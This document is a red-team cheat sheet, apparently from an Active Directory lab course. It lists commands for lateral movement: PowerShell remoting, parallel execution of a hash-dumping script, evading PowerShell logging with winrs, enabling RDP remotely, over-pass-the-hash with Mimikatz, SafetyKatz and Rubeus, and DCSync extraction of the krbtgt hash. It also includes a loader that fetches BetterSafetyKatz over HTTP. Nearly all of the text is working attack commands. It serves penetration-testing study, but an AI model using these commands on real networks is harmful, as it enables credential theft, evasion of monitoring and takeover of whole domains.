Lateral Movement

Powershell Remoting

PS Remoting is a feature of Windows Server, similar to SSH on Linux, that lets administrators perform tasks on remote machines without being physically present at each one. It runs over Windows Remote Management (WinRM) on port 5985 (HTTP) and 5986 (HTTPS).

Command to enable PS Remoting on the local machine

Enable-PSRemoting -Force

Command to enable PS Remoting on a remote machine

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

If we have administrative access on another machine (for example, one found through user hunting):

Enter-PSSession dcorp-adminsrv

OR

$session = New-PSSession -ComputerName dcorp-adminsrv
Enter-PSSession -Session $session

To execute commands in parallel on many machines

If we have the privilege to execute commands on many machines, use the command below. First create a file with the names of the computers to run the commands on.

Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <server-lists>)

To execute scripts in parallel on many machines

As above, create a file with the names of the computers/servers to run the script on.

Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <server-lists>)

To evade PowerShell logging by the blue team we can use winrs (winrs still goes over WinRM, so the WinRM operational log on the target still records the session)

winrs -remote:<server-name> -u:server1\administrator -p:Pass@123 hostname

Enable RDP access on another computer using a script block

Invoke-Command -ScriptBlock {Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0} -ComputerName dcorp-adminsrv

Over-Pass-The-Hash

The AES256 key or RC4 (NTLM) hash needed here can be obtained with Mimikatz or SafetyKatz. Over-pass-the-hash with any of the techniques below uses logon type 9 (NewCredentials), which means running whoami in the new process still shows student1 (or whatever the current username is), but we can access remote resources such as the domain controller, for example with winrs -r:dcorp-dc cmd

Using Mimikatz (needs elevation: run as administrator)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"'

Using SafetyKatz (needs elevation: run as administrator)

SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"

Using BetterSafetyKatz

BetterSafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"

Using Rubeus (does not need elevation)

Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt

Using Rubeus (needs elevation)

Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

DCSync (needs Domain Admin privileges by default)

DCSync is a late-stage kill chain attack: it means the attacker controls a user who has Active Directory domain replication rights. Domain replication is the method by which object changes are synchronised from one DC to another, and during this process the DC returns replication data to the requester, including password hashes.

DCSync to extract the krbtgt hash for the us domain

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

DCSync to extract the krbtgt hash for the us domain using SafetyKatz

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

DCSync to extract the krbtgt hash using BetterSafetyKatz

BetterSafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

If the above does not work, use the commands below to get the NTLM hash instead of the AES key.

Use the "lsadump::lsa /patch" "exit" arguments:

.\Loader.exe -path http://127.0.0.1:8080/BetterSafetyKatz.exe "lsadump::lsa /patch" "exit"
BetterSafetyKatz.exe "lsadump::lsa /patch"
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
SafetyKatz.exe "lsadump::lsa /patch"
